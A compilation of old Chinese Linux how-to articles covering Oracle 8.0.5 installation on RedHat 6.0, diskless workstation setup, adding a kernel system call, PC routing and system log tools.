----由于RedHat 6.0使用的是glibc 2.0，因此在RedHat 6.0环境下安装Oracle 8.0.5需打补丁。方法是：卸载位于ftp.Oracle.com站点的/pub/www/otn/linux/glibcpatch.tgz文件，在完成Oracle基本系统安装后，对＄ORACLE_HOME/bin目录下的执行程序进行修正。

----做完上述工作后，即可以开始Oracle基本系统的安装：

1.进入/home/Oracle目录

2.执行./orainst /c

3.选择Custom安装

根据提示进行以下选择：

Install, Upgrade or De－install software

----Install new product －DO NOT CREAT DB Objects。 这一步非常重要。由于原安装包中的执行程序与glibc2.0不兼容，因此，在打补丁前，无法启动Oracle引擎来创建数据库对象。

----按照上述步骤执行完退出后，系统应提示：

Result:Success.

4.对Oracle执行程序进行glibc修正。步骤如下：

＊ 建立＄ORACLE_HOME/orapatch目录

＊ 将glibcpatch.tgz拷贝至主目录

＊ 执行tar －xvzf glibcpatch.tgz

＊ 执行sh glibcpatch.sh

----完成补丁程序安装后，要重新运行Oracle的安装程序，步骤如下：

＊ cd orainst

＊ 执行 orainst /c

＊ 进行custom安装

----根据提示进行以下选择：

Create /upgrade Database objects

Create Database objects

Oracle 8 Standard RDBMS 8.0.5.0.0

Create product DB Objects

Filesystem－bases Database

直至提示：Rusult:Success

5.执行后安装处理：

＊ 以Oracle用户登录

＊ 执行 su －p root , 输入root用户密码

＊ cd orainst

＊ 执行sh root.sh

＊ 编辑修改 /etc/oratab文件:

找到Oracle－SID指示行如：

＄BROS:/u0/Oracle:N

----修改为：

＄BROS:/u0/Oracle:Y

----以允许Oracle服务器自启动。

＊ 修改TNS相关的文件权限：

chown oracle.dba ＄ORACLE_HOME/bin/tnslsnr

chmod 750 ＄ORACLE_HOME/bin/tnslsnr

chown oracle.dba ＄ORACLE_HOME/network/log

chmod 775 ＄ORACLE_HOME/network/log

chown root.dba ＄ORACLE_HOME/network/log/listener.log

chmod 664 ＄ORACLE_HOME/network/log/listener.log

----至此，安装基本完成。

三、 测试与调整

----以Oracle用户登录，执行dbstart，Oracle引擎应正常启动。

----执行lsnrctl start启动Oracle网络服务，则从Windows的sql＊net、sql plus环境可登录Oracle服务器。

----取决于服务器硬件资源配置，为改善性能可以对Oracle的系统全局缓冲区(System Global Area)等参数进行重新配置，以改善性能。

返回


Linux环境下无盘工作站的架设和实现

《一键清理系统垃圾》

Linux环境下无盘工作站的架设和实现

     LINUX无盘工作站的建立，需要作客户端和服务器端两方面的工作，本文将详细叙述一下建立linux无盘工作站的步骤。

    一.无盘工作站客户端

    这部分的主要任务是做一个EPROM的启动文件，还包括一个处理Linux内核的工具mknbi-linux。有两个package：etherboot和netboot可供选用， etherboot对网卡型号有要求，支持的网卡种类不算很多，但对最常用的网卡如3c503/507/509/905b、NE1000/2000/PCIne2000、Intel eepro等基本上都能支持；Netboot可以用ndis或pktdrv，这些文件一般在随卡附带的驱动盘上都有，但这仅限于网络启动，对网卡的要求首先是Linux能识别。

    以下步骤所述适用于etherboot；

    1. 展开etherboot，进入src-32，编辑Config。有许多选项可以让你做多重启动、显示信息、询问口令之类的事情，这时你需要做的是用bootp代替dhcp，即在Config中定义-DNO_DHCP_SUPPORT设置。因为我们打算在服务器端用bootp，所以这是必须的，否则在启动时会因为未能寻找到dhcp server而启动不了。如果你准备在服务器端使用dhcp，那么这一步就不需要了。

    2. make。对每种网卡都会生成两个文件 .rom和 .lzrom，后者是压缩过的。

    3. 使用软盘启动验证所作的启动ROM没问题，假设你用的网卡是ne2000兼容的：

    cat ../src/floppyload.bin ne.lzrom > /dev/fd0

    如用软盘启动，系统能探测到你的网卡并发出bootp请求。如果一切OK，你就可以把ROM文件刻写到EPROM里了。

    4. cd ../netboot*；make；make install。make如果出错，解决办法是把系统中的bcc改名，然后将gcc连接成bcc，再重新make。最后在系统中会增加一个程序mknbi-linux，这是用来处理linux内核的，在服务器端设置部分会讲它的用法。

    客户端的工作完成了。

    二、服务器端:

    假设你的无盘工作站ip为10.0.0.1; 机器名为dc1.subnet.net,另一台无盘工作站ip为10.0.0.2,机器名为dc2.subnet.net, 服务器ip为10.0.0.254，名为server.subnet.net。

1. 修改/etc/hosts，增加dc1.subnet.net,dc2.subnet.net

2. 取得bootp-2.x.x，展开后注意把带的各种patch都打上。然后make; make install

3. 建立/etc/bootptab，如下：
global.prof:

:sm=255.255.255.0:

:bf=/tftpboot/vmlinuz.nb:

dc1:tc=global.prof:ha=0000c0863d7a:ip=10.0.0.1:

dc2:tc=global.prof:ha=0800110244e1:ip=10.0.0.2:

ha用无盘工作站网卡的MAC地址代替。

4. 修改inetd.conf，去掉bootpd和tftpd的#号，如下：

tftp dgram udp wait root /usr/sbin/tcpd tftpd –s /tftpboot

bootps dgram udp wait root /usr/sbin/tcpd bootpd -i

kill –HUP `cat /var/run/inetd.pif`
5. 建立/tftpboot/10.0.0.1，cd /tftpboot/10.0.0.1，

（cd /； tar cpf – lib sbin bin var etc dev）| tar xpf –

mkdir usr； mkdir tmp； chmod 1777 tmp； mkdir home；mkdir root; mkdir proc; mkdir mnt

6. touch fastboot; chattr +i fastboot

(fstab 中 / 和 /usr 的最后一项设成0，也许不需要这一步了，但我没试过)

以下是一个shell script，可用于自动执行以上操作。

#!/bin/sh

if [ $# != 1 ]

then

echo Usage: $0 client-IP-addr

exit 1

fi

cd /

umask 022

mkdir -p /tftpboot/$1

# just make these ones

for d in home mnt proc tmp usr

do

mkdir /tftpboot/$1/$d

done

chmod 1777 /tftpboot/$1/tmp

touch /tftpboot/$1/fastboot

chattr +i /tftpboot/$1/fastboot

# copy these ones

(cd /; tar cpf - bin lib sbin dev etc var) | (cd /tftpboot/$1; tar xpf -)

7. 删除var下一切不需要的东西, 减小空间。删除lib/modules下一切不需要的模块。

8. 修改etc/sysconfig/network，etc/sysconfig/network-scripts/ifcfg-eth0，

etc/fstab，etc/conf.module

fstab中指明root在服务器server上，like this

server:/tftpboot/10.0.0.1 / nfs default 0 0

server:/usr /usr nfs default 0 0

9. 配置etc/rc.d/rc3.d，关掉一切不需要的网络服务。

10. 删除etc/rc.d/rc6.d/K??network。

11. 修改etc/rc.d/rc.sysinit，寻找“mount –a –t nonfs，smbfs…"改成

“mount.–a –t nosmbfs…"

12. mkdir /tftpboot/10.0.0.2; cd /tftpboot/10.0.0.2;

(cd ../10.0.0.1; tar cpf - *) | tar xpf –
13. 修改etc/sysconfig/network，etc/sysconfig/network-scripts/ifcfg-eth0，

etc/fstab，etc/conf.module

14. cd /etc； vi exports；

/usr dc*.subnet.net(ro)

/tftpboot/10.0.0.1 dc1.subnet.net(rw,no_root_squash)

/tftpboot/10.0.0.2 dc2.subnet.net(rw,no_root_squash)

exportfs –a

15. 编译一个新内核，必须包含以下特性：

NFS filesystem 支持

Root on NFS 支持

Bootp 支持

无盘工作站所用的网卡型号支持

编译出新内核之后，用mknbi-linux处理，

mknbi-linux bzImage vmlinuz.nb

将vmlinuz.nb放在/tftpboot下即可。

至此，服务器端的工作就完成了。

    注意事项：

    1. 如果你打算在服务器端用dhcp，需要自己配置，参看dhcp的文档。

    2. Rh6.1自带一个bootparamd，也应该能完成同样的工作，但在manual中语焉不详，不知该如何设置。

    3. 服务器端 / 和 /usr 最好单独分区。

    4. etherboot的文档上说对有些网卡比如PCI NE2000兼容网卡，可能需要调整Makefile中的vendor信息和ID信息，我还未试过。

    启动你的无盘工作站，如一切操作无误的话，工作站则应该能启动起来。启动过程中如果有一些地方不顺利，可以在启动之后对无盘工作站上按一般方法进行设置。

    希望以上的讲述能给读者有所帮助和启迪！

返回


Linux内核解读入门

《一键清理系统垃圾》

Linux内核解读入门

    很多Linux 爱好者对内核很感兴趣却无从下手，本文旨在介绍一种解读Linux内核源码的入门方法，而不是讲解Linux复杂的内核机制。
    1．核心源程序的文件组织
    （1）Linux核心源程序通常都安装在/usr/src/Linux下，而且它有一个非常简单的编号约定：任何偶数的核心（中间数字）如：2.0.30都是一个稳定的发行的核心，而任何奇数的核心如：2.1.42都是一个开发中的核心。
    本文基于稳定的2.2.5源代码，第二部分的实现平台为Redhat Linux 6.0。
    （2）核心源程序的文件按树形结构进行组织，在源程序树的最上层你会看到这样一些目录：
    arch：arch子目录包括了所有和体系结构相关的核心代码。它的每一个子目录都代表一种支持的体系结构，例如i386就是关于Intel CPU及与之相兼容体系结构的子目录。PC机一般都基于此目录；
    include：include子目录包括编译核心所需要的大部分头文件。与平台无关的头文件在include/linux子目录下，与Intel CPU相关的头文件在include/asm－i386子目录下，而include/scsi目录则是有关SCSI设备的头文件目录；
    init：这个目录包含核心的初始化代码（注：不是系统的引导代码），包含两个文件main.c和Version.c，这是研究核心如何工作的一个非常好的起点；
    Mm：这个目录包括所有独立于CPU 体系结构的内存管理代码，如页式存储管理内存的分配和释放等，而和体系结构相关的内存管理代码则位于arch/＊/mm/，例如arch/i386/mm/Fault.c；
    Kernel：主要的核心代码，此目录下的文件实现了大多数Linux系统的内核函数，其中最重要的文件当属sched.c，同样，和体系结构相关的代码在arch/＊/kernel中；
    Drivers：放置系统所有的设备驱动程序；每种驱动程序又各占用一个子目录，如/block下为块设备驱动程序，比如ide（ide.c）。如果你希望查看所有可能包含文件系统的设备是如何初始化的，你可以看drivers/block/genhd.c中的device_setup（）函数。它不仅初始化硬盘，也初始化网络，因为安装nfs文件系统的时候需要使用网络。
    其他目录如Lib：放置核心的库代码；Net：核心与网络相关的代码；Ipc：包含核心的进程间通信的代码；Fs：所有的文件系统代码和各种类型的文件操作代码，它的每一个子目录支持一个文件系统，例如fat和ext2、Scripts，此目录包含用于配置核心的脚本文件等。
    一般在每个目录下都有一个.depend 文件和一个Makefile 文件，这两个文件都是编译时使用的辅助文件，仔细阅读这两个文件对弄清各个文件之间的联系和依托关系很有帮助，而且在有的目录下还有Readme 文件，它是对该目录下的文件的一些说明，同样有利于我们对内核源码的理解。
    2．解读实战：为你的内核增加一个系统调用
    虽然Linux 的内核源码用树形结构组织得非常合理、科学，把与功能相关联的文件都放在同一个子目录下，这样使得程序更具可读性。然而，Linux 的内核源码实在是太大而且非常复杂，即便采用了很合理的文件组织方法，在不同目录下的文件之间还是有很多的关联，分析核心的一部分代码通常要查看其他的几个相关的文件，而且可能这些文件还不在同一个子目录下。
    下面举一个具体的内核分析实例，希望能通过这个实例，使读者对Linux 的内核组织有些具体的认识，读者从中也可以学到一些对内核的分析方法。
    以下即为分析实例：
    （1）操作平台
    硬件：CPU Intel Pentium II；
    软件：Redhat Linux 6.0，内核版本2.2.5
    （2）相关内核源代码分析
    ①系统的引导和初始化：Linux 系统的引导有好几种方式，常见的有Lilo、Loadin引导和Linux的自举引导（bootsect－loader），而后者所对应源程序为arch/i386/boot/bootsect.S，它为实模式的汇编程序，限于篇幅在此不做分析。无论是哪种引导方式，最后都要跳转到arch/i386/Kernel/setup.S。setup.S主要是进行实模式下的初始化，为系统进入保护模式做准备。此后，系统执行arch/i386/kernel/head.S （对经压缩后存放的内核要先执行arch/i386/boot/compressed/head.S）；head.S 中定义的一段汇编程序setup_idt，它负责建立一张256项的idt表（Interrupt Descriptor Table），此表保存着所有自陷和中断的入口地址，其中包括系统调用总控程序system_call 的入口地址。当然，除此之外，head.S还要做一些其他的初始化工作。
    ②系统初始化后运行的第一个内核程序asmlinkage void __init start_kernel（void） 定义在/usr/src/linux/init/main.c中，它通过调用usr/src/linux/arch/i386/kernel/traps.c 中的一个函数void __init trap_init（void） 把各个自陷和中断服务程序的入口地址设置到idt表中，其中系统调用总控程序system_cal就是中断服务程序之一；void __init trap_init（void）函数则通过调用一个宏set_system_gate（SYSCALL_VECTOR，＆system_call），把系统调用总控程序的入口挂在中断0x80上。
    其中SYSCALL_VECTR是定义在/usr/src/linux/arch/i386/kernel/irq.h中的一个常量0x80，而system_call 即为中断总控程序的入口地址，中断总控程序用汇编语言定义在/usr/src/linux/arch/i386/kernel/entry.S中。
    ③中断总控程序主要负责保存处理机执行系统调用前的状态，检验当前调用是否合法，并根据系统调用向量，使处理机跳转到保存在sys_call_table 表中的相应系统服务例程的入口，从系统服务例程返回后恢复处理机状态退回用户程序。
    而系统调用向量则定义在/usr/src/linux/include/asm－386/unistd.h 中，sys_call_table 表定义在/usr/src/linux/arch/i386/kernel/entry.S 中，同时在/usr/src/linux/include/asm－386/unistd.h 中也定义了系统调用的用户编程接口。
    ④由此可见，Linux的系统调用也像DOS系统的int 21h中断服务，大把0x80中断作为总的入口，然后转到保存在sys_call_table表中的各种中断服务例程的入口地址，提供各种不同的中断服务。
    提供上源代码分析可知，要增加一个系统调用就必须在sys_call_table表中增加一项，并在其中保存好自己的系统服务例程的入口地址，然后重新编译内核，当然，系统服务例程是必不可少的。
    由此可知，在此版Linux内核源程序<2.2.5>中，与系统调用相关的源程序文件就包括以下这些：
    ＊ arch/i386/boot/bootsect.S
    ＊ rch/i386/Kernel/setup.S
    ＊ rch/i386/boot/compressed/head.S
    ＊ rch/i386/kernel/head.S
    ＊ nit/main.c
    ＊ rch/i386/kernel/traps.c
    ＊ rch/i386/kernel/entry.S
    ＊ rch/i386/kernel/irq.h
    ＊ nclude/asm－386/unistd.h
    当然，这只是涉及到的几个主要文件。而事实上，增加系统调用真正要修改的文件只有include/asm－386/unistd.h 和arch/i386/kernel/entry.S两个。
    （3）源码的修改
    ①kernel/sys.c中增加系统服务例程如下：
    asmlinkage int sys_addtotal（int numdata）
    { int i=0，enddata=0;
       while（i<=numdata）
       enddata+=i++;
       return enddata; }
    该函数有一个int 型入口参数numdata ， 并返回从0 到numdata 的累加值，然而也可以把系统服务例程放在一个自己定义的文件或其他文件中，只是要在相应文件中作必要的说明。
    ②把smlinkage int sys_addtotal（ int） 的入口地址加到sys_call_table表中。
    arch/i386/kernel/entry.S 中的最后几行源代码修改前为:
    .long SYMBOL_NAME（sys_sendfile）
    .long SYMBOL_NAME（sys_ni_syscall） /* streams1 */
    .long SYMBOL_NAME（sys_ni_syscall） /* streams2 */
    .long SYMBOL_NAME（sys_vfork） /* 190 */
    .rept NR_syscalls-190
    .long SYMBOL_NAME（sys_ni_syscall）
    .endr
    修改后为:
    .long SYMBOL_NAME（sys_sendfile）
    .long SYMBOL_NAME（sys_ni_syscall） /* streams1 */
    .long SYMBOL_NAME（sys_ni_syscall） /* streams2 */
    .long SYMBOL_NAME（sys_vfork） /* 190 */
    /* add by I */
    .long SYMBOL_NAME（sys_addtotal）
    .rept NR_syscalls-191
    .long SYMBOL_NAME（sys_ni_syscall）
    .endr
    ③把增加的sys_call_table 表项所对应的向量，在include/asm-386/unistd.h 中进行必要申明，以供用户进程和其他系统进程查询或调用。
    增加后的部分/usr/src/linux/include/asm-386/unistd.h 文件如下:
    #define __NR_sendfile 187
    #define __NR_getpmsg 188
    #define __NR_putpmsg 189
    #define __NR_vfork 190
    /* add by I */
    #define __NR_addtotal 191
    ④测试程序（test.c）如下:
    #include
    #include
    _syscall1（int，addtotal，int， num）
    main（）
    {　int i，j;
      do
    printf（\"Please input a numbern\"）;
    while（scanf（\"%d\"，&i）==EOF）;
    if（（j=addtotal（i））==-1）
    printf（\"Error occurred in syscall-addtotal（），n\"）;
    printf（\"Total from 0 to %d is %d n\"，i，j）; }
    对修改后的新的内核进行编译，并引导它作为新的操作系统，运行几个程序后可以发现一切正常；在新的系统下对测试程序进行编译（注：由于原内核并未提供此系统调用，所以只有在编译后的新内核下，此测试程序才可能被编译通过），运行情况如下：
    $gcc .test test.c
    $./test
    Please input a number
    36
    Total from 0 to 36 is 666
    修改成功后对相关源码进一步分析可知，在此版本的内核中，从/usr/src/linux/arch/i386/kernel/entry.S 文件中对sys_call_table 表的设置可以看出，有好几个系统调用的服务例程都是定义在/usr/src/linux/kernel/sys.c 中的同一个函数：
    asmlinkage int sys_ni_syscall（void）
    {　return -ENOSYS; }
    例如第188项和第189项就是如此：
    .long SYMBOL_NAME（sys_sendfile）
    .long SYMBOL_NAME（sys_ni_syscall） /* streams1 */
    .long SYMBOL_NAME（sys_ni_syscall） /* streams2 */
    .long SYMBOL_NAME（sys_vfork） /* 190 */
    而这两项在文件/usr/src/linux/include/asm-386/unistd.h 中却申明如下：
    #define __NR_sendfile 187
    #define __NR_getpmsg 188 /* some people actually want streams */
    #define __NR_putpmsg 189 /* some people actually want streams */
    #define __NR_vfork 190
    由此可见，在此版本的内核源代码中，由于asmlinkage int sys_ni_syscall（void） 函数并不进行任何操作，所以包括getpmsg， putpmsg 在内的好几个系统调用都是不进行任何操作的，即有待扩充的空调用；但它们却仍然占用着sys_call_table表项，估计这是设计者们为了方便扩充系统调用而安排的，所以只需增加相应服务例程（如增加服务例程getmsg或putpmsg），就可以达到增加系统调用的作用。
    3．结束语
    要完全解读庞大复杂的Linux内核，一篇文章远远不能介绍清楚，而且与系统调用相关的代码也只是内核中极其微小的一部分，重要的是方法，掌握好的分析方法，所以上述分析只是起个引导作用，而真正的分析还有待读者自己的努力。


Linux巧变PC为路由器

《一键清理系统垃圾》

Linux巧变PC为路由器

----在两个或三个网段的小型网络中，利用Linux把微机安装成局域网路由器，能以较低的投资取得较好的效果。
----这里以Red Hat Linux 5.1版为例，来说明如何把一台HP VL5/166的微机，安装成带三块3Com 3C509网卡的局域网路由器。

----更改网卡配置

----首先，更改三块3C509网卡的中断号和输入输出范围，使三块网卡不会出现冲突，并将网卡的即插即用功能由enable改为disable。三块网卡的中断号和输入输出范围分别是：5/0x310、10/0x300、11/0x210。

----其次，在微机上安装Linux。安装过程不再详细描述，注意安装前先插一块网卡。在安装过程中，Linux会自动找到此块网卡，并命名为eth0，此时可配置一些参数，如IP地址为10.130.28.254，子网掩码为255.255.255.0，安装过程中要把网络包安装上。

----然后，关闭微机，插入第二块网卡，重新启动。在Linux启动时，会自动找到第二块网卡。启动完毕后，以root登录，运行dmesg|more命令，可以查看启动过程记录，其中有以下提示：

eth0：3c509 at ox310 tag1, 10baseT port, address 00 20 af dc e9 46, IRQ 5

eth1：……

----说明系统对第一块网卡配置正确，并找到第二块网卡。运行网络配置工具netconf：

[root] ＃ netconf

----进入网络配置工具

----选择第一项client tasks，进入后选择Basic host information，然后选择Adaptor2作为第二块网卡，第一块网卡为Adaptor1，已配好。Adaptor2配置如下：

Config mode [＊] Enabled

[＊] Manual ( )DHCP ( )BootP

Primary name＋domain router:

(原为空，不用更改）

Aliases(opt): (原为空，不用更改）

IP address: 10.130.29.254

Netmask(opt): 255.255.255.0

Net device: eth1

Kernel module: 3c509

I/O port (opt): (原为空，不用更改）

Irq(opt): (原为空，不用更改）

----配置完后，选择“quit”，再选择“Accept”，退到最后出现：

Active the changes

Preview what has to be done

Don′t quit

----选择Active the changes，退出网络配置工具。此时已把第二块网卡eth1配置好。运行ifconfig命令可以查看网卡的参数和状态。与第二块网卡一样，把第三块网卡配置好，设置IP地址为10.130.30.254，子网掩码为255.255.255.0。

----配置路由服务

----先在启动时加载routed进程，运行系统设置工具setup。选择ntsys，进入后，在系统把启动时自动运行的服务列表中routed前打上星号（按空格键）以选择该项服务。选择OK退出，再选择quit退出。在网络配置工具中启动RIP路由功能。运行netconfig，分别选择client tasks、Routing and gateways、Set default，出现：

Default gateway： 0.0.0.0

[ ] Enable routing

----在Enable routing前打上星号（按空格键），启动路由功能。选择Accept，再根据提示退出网络配置工具。至此，路由配置完成。若有到其它路由器的路由，可以用网络配置中的Set other routes to networks选项或router add命令，来添加路由项。

----最后重新启动机器，把三个网段的交换机或集线器接到该机器上，整个配置完成。若需进行测试，可用一个网段上的机器ping另一网段上的机器，能ping通，说明路由正常。

----一点说明

----目前我所在的单位因网络设备没有到位，暂时用以上的一台微机做路由器，连接近百台微机的三个网段，效果令人比较满意。 配置中用到的命令或工具 dmesg 查看系统启动记录
netconf 网络配置工具
setup 系统配置工具
ifconfig 网卡参数配置和查看
router 路由配置和查看

返回


Linux日志管理详解(上）

《一键清理系统垃圾》

Linux日志管理详解(上）

    日志对于安全来说，非常重要，他记录了系统每天发生的各种各样的事情，你可以通过他来检查错误发生的原因，或者受到攻击时攻击者留下的痕迹。日志主要的功能有：审计和监测。他还可以实时的监测系统状态，监测和追踪侵入者等等。

    在Linux系统中，有三个主要的日志子系统：

    连接时间日志--由多个程序执行，把纪录写入到/var/log/wtmp和/var/run/utmp，login等程序更新wtmp和utmp文件，使系统管理员能够跟踪谁在何时登录到系统。

    进程统计--由系统内核执行。当一个进程终止时，为每个进程往进程统计文件（pacct或acct）中写一个纪录。进程统计的目的是为系统中的基本服务提供命令使用统计。

    错误日志--由syslogd（8）执行。各种系统守护进程、用户程序和内核通过syslog（3）向文件/var/log/messages报告值得注意的事件。另外有许多UNIX程序创建日志。像HTTP和FTP这样提供网络服务的服务器也保持详细的日志。

    常用的日志文件如下：

    access-log　　　　　　　　 纪录HTTP/web的传输

    acct/pacct　　　　　　　　 纪录用户命令

    aculog　　　　　　　　　　 纪录MODEM的活动

    btmp　　　　　　　　　　　　纪录失败的纪录

    lastlog　　纪录最近几次成功登录的事件和最后一次不成功的登录

    messages　　　　从syslog中记录信息（有的链接到syslog文件）

    sudolog　　　　　　　　　　 纪录使用sudo发出的命令

    sulog　　　　　　　　　　 纪录使用su命令的使用

    syslog　　　　 从syslog中记录信息（通常链接到messages文件）

    utmp　　　　　　　　　　　　纪录当前登录的每个用户

    wtmp　　　　　　　　一个用户每次登录进入和退出时间的永久纪录

    xferlog　　　　　　　　　　 纪录FTP会话

    utmp、wtmp和lastlog日志文件是多数重用UNIX日志子系统的关键--保持用户登录进入和退出的纪录。有关当前登录用户的信息记录在文件utmp中；登录进入和退出纪录在文件wtmp中；最后一次登录文件可以用lastlog命令察看。数据交换、关机和重起也记录在wtmp文件中。所有的纪录都包含时间戳。这些文件（lastlog通常不大）在具有大量用户的系统中增长十分迅速。例如wtmp文件可以无限增长，除非定期截取。许多系统以一天或者一周为单位把wtmp配置成循环使用。它通常由cron运行的脚本来修改。这些脚本重新命名并循环使用wtmp文件。通常，wtmp在第一天结束后命名为wtmp.1；第二天后wtmp.1变为wtmp.2等等，直到wtmp.7。

    每次有一个用户登录时，login程序在文件lastlog中察看用户的UID。如果找到了，则把用户上次登录、退出时间和主机名写到标准输出中，然后login程序在lastlog中纪录新的登录时间。在新的lastlog纪录写入后，utmp文件打开并插入用户的utmp纪录。该纪录一直用到用户登录退出时删除。utmp文件被各种命令文件使用，包括who、w、users和finger。

    下一步，login程序打开文件wtmp附加用户的utmp纪录。当用户登录退出时，具有更新时间戳的同一utmp纪录附加到文件中。wtmp文件被程序last和ac使用。

具体命令
    wtmp和utmp文件都是二进制文件，他们不能被诸如tail命令剪贴或合并（使用cat命令）。用户需要使用who、w、users、last和ac来使用这两个文件包含的信息。

    who：who命令查询utmp文件并报告当前登录的每个用户。Who的缺省输出包括用户名、终端类型、登录日期及远程主机。例如：who（回车）显示

    chyang　　　　 pts/0 Aug　　　　 18 15:06

    ynguo　　　　 pts/2 Aug　　　　 18 15:32

    ynguo　　　　 pts/3 Aug　　　　 18 13:55

    lewis　　　　 pts/4 Aug　　　　 18 13:35

    ynguo　　　　 pts/7 Aug　　　　 18 14:12

    ylou　　　　 pts/8 Aug　　　　 18 14:15

    如果指明了wtmp文件名，则who命令查询所有以前的纪录。命令who /var/log/wtmp将报告自从wtmp文件创建或删改以来的每一次登录。

    w：w命令查询utmp文件并显示当前系统中每个用户和它所运行的进程信息。例如：w（回车）显示：3:36pm up 1 day, 22:34, 6 users, load average: 0.23, 0.29, 0.27。

    USER　　 TTY　　　　FROM　　　　 LOGIN@ IDLE JCPU PCPU　　WHAT

    chyang pts/0 202.38.68.242　　3:06pm 2:04 0.08s 0.04s -bash

    ynguo pts/2 202.38.79.47　　 3:32pm 0.00s 0.14s 0.05　　 w

    lewis pts/3 202.38.64.233　　1:55pm 30:39 0.27s 0.22s -bash

    lewis pts/4 202.38.64.233　　1:35pm 6.00s 4.03s 0.01s sh /home/users/

    ynguo pts/7 simba.nic.ustc.e 2:12pm 0.00s 0.47s 0.24s telnet mail

    ylou　　pts/8 202.38.64.235　　2:15pm 1:09m 0.10s 0.04s　　-bash

users：users用单独的一行打印出当前登录的用户，每个显示的用户名对应一个登录会话。如果一个用户有不止一个登录会话，那他的用户名将显示相同的次数。例如：users（回车）显示：chyang lewis lewis ylou ynguo ynguo

    last：last命令往回搜索wtmp来显示自从文件第一次创建以来登录过的用户。例如：

    chyang pts/9　　202.38.68.242 Tue Aug 1 08:34 - 11:23 (02:49)

    cfan　　pts/6　　202.38.64.224 Tue Aug 1 08:33 - 08:48 (00:14)

    chyang pts/4　　202.38.68.242 Tue Aug 1 08:32 - 12:13 (03:40)

    lewis pts/3　　202.38.64.233 Tue Aug 1 08:06 - 11:09 (03:03)

    lewis pts/2　　202.38.64.233 Tue Aug 1 07:56 - 11:09 (03:12)

    如果指明了用户，那么last只报告该用户的近期活动，例如：last ynguo（回车）显示：

    ynguo　　pts/4 simba.nic.ustc.e Fri Aug 4 16:50 - 08:20 (15:30)

    ynguo　　pts/4 simba.nic.ustc.e Thu Aug 3 23:55 - 04:40 (04:44)

    ynguo　　pts/11 simba.nic.ustc.e Thu Aug 3 20:45 - 22:02 (01:16)

    ynguo　　pts/0 simba.nic.ustc.e Thu Aug 3 03:17 - 05:42 (02:25)

    ynguo　　pts/0 simba.nic.ustc.e Wed Aug 2 01:04 - 03:16 1+02:12)

    ynguo　　pts/0 simba.nic.ustc.e Wed Aug 2 00:43 - 00:54 (00:11)

    ynguo　　pts/9 simba.nic.ustc.e Thu Aug 1 20:30 - 21:26 (00:55)

    ac：ac命令根据当前的/var/log/wtmp文件中的登录进入和退出来报告用户连结的时间（小时），如果不使用标志，则报告总的时间。例如：ac（回车）显示：total 5177.47

    ac -d（回车）显示每天的总的连结时间

    Aug 12 total 261.87

    Aug 13 total 351.39

    Aug 14 total 396.09

    Aug 15 total 462.63

    Aug 16 total 270.45

    Aug 17 total 104.29

    Today total 179.02

    ac -p （回车）显示每个用户的总的连接时间

    ynguo 193.23

    yucao 3.35

    rong 133.40

    hdai 10.52

    zjzhu 52.87

    zqzhou 13.14

    liangliu 24.34

    total 5178.24

    lastlog：lastlog文件在每次有用户登录时被查询。可以使用lastlog命令来检查某特定用户上次登录的时间，并格式化输出上次登录日志/var/log/lastlog的内容。它根据UID排序显示登录名、端口号（tty）和上次登录时间。如果一个用户从未登录过，lastlog显示"**Never logged**。注意需要以root运行该命令，例如：

    rong　　　　　　5　　 202.38.64.187　　　　　　　　 Fri Aug 18 15:57:01 +0800 2000

    dbb　　　　　　　　　　　　　　　　　　　　　　　　　　 **Never logged in**

    xinchen　　　　　　　　　　　　　　　　　　　　　　　　 **Never logged in**

    pb9511　　　　　　　　　　　　　　　　　　　　　　　　 **Never logged in**

    xchen　　　　 0　　 202.38.64.190　　　　　　　　 Sun Aug 13 10:01:22 +0800 2000

    另外，可一加一些参数，例如，last -u 102将报告UID为102的用户；last -t 7表示限制上一周的报告。

返回


Linux日志管理详解（下）

《一键清理系统垃圾》

Linux日志管理详解（下）

进程统计
    UNIX可以跟踪每个用户运行的每条命令，如果想知道昨晚弄乱了哪些重要的文件，进程统计子系统可以告诉你。它对还跟踪一个侵入者有帮助。与连接时间日志不同，进程统计子系统缺省不激活，它必须启动。在Linux系统中启动进程统计使用accton命令，必须用root身份来运行。Accton命令的形式accton file，file必须先存在。先使用touch命令来创建pacct文件：touch /var/log/pacct，然后运行accton： accton /var/log/pacct。一旦accton被激活，就可以使用lastcomm命令监测系统中任何时候执行的命令。若要关闭统计，可以使用不带任何参数的accton命令。

    lastcomm命令报告以前执行的文件。不带参数时，lastcomm命令显示当前统计文件生命周期内纪录的所有命令的有关信息。包括命令名、用户、tty、命令花费的CPU时间和一个时间戳。如果系统有许多用户，输入则可能很长。下面的例子：

    crond　　　　 F　　　 root　　 ??　　 0.00 secs Sun Aug 20 00:16

    promisc_check.s S　　 root　　 ??　　 0.04 secs Sun Aug 20 00:16

    promisc_check　　　　 root　　 ??　　 0.01 secs Sun Aug 20 00:16

    grep　　　　　　　　　 root　　 ??　　 0.02 secs Sun Aug 20 00:16

    tail　　　　　　　　　 root　　 ??　　 0.01 secs Sun Aug 20 00:16

    sh　　　　　　　　　　 root　　 ??　　 0.01 secs Sun Aug 20 00:15

    ping　　　　　　S　　　root　　 ??　　 0.01 secs Sun Aug 20 00:15

    ping6.pl　　　　F　　　root　　 ??　　 0.01 secs Sun Aug 20 00:15

    sh　　　　　　　　　　　root　　 ??　　 0.01 secs Sun Aug 20 00:15

    ping　　　　　　S　　　root　　 ??　　 0.02 secs Sun Aug 20 00:15

    ping6.pl　　　　F　 　 root　　 ??　　 0.02 secs Sun Aug 20 00:15

    sh　　　　　　　　　　　root　　 ??　　 0.02 secs Sun Aug 20 00:15

    ping S root ?? 0.00 secs Sun Aug 20 00:15

    ping6.pl F root ?? 0.01 secs Sun Aug 20 00:15

    sh root ?? 0.01 secs Sun Aug 20 00:15

    ping S root ?? 0.01 secs Sun Aug 20 00:15

    sh root ?? 0.02 secs Sun Aug 20 00:15

    ping S root ?? 1.34 secs Sun Aug 20 00:15

    locate root ttyp0 1.34 secs Sun Aug 20 00:15

    accton S root ttyp0 0.00 secs Sun Aug 20 00:15

    进程统计的一个问题是pacct文件可能增长的十分迅速。这时需要交互式的或经过cron机制运行sa命令来保持日志数据在系统控制内。sa命令报告、清理并维护进程统计文件。它能把/var/log/pacct中的信息压缩到摘要文件/var/log/savacct和/var/log/usracct中。这些摘要包含按命令名和用户名分类的系统统计数据。sa缺省情况下先读它们，然后读pacct文件，使报告能包含所有的可用信息。sa的输出有下面一些标记项：

    avio--每次执行的平均I/O操作次数

    cp--用户和系统时间总和，以分钟计

    cpu--和cp一样

    k--内核使用的平均CPU时间，以1k为单位

    k*sec--CPU存储完整性，以1k-core秒

    re--实时时间，以分钟计

    s--系统时间，以分钟计

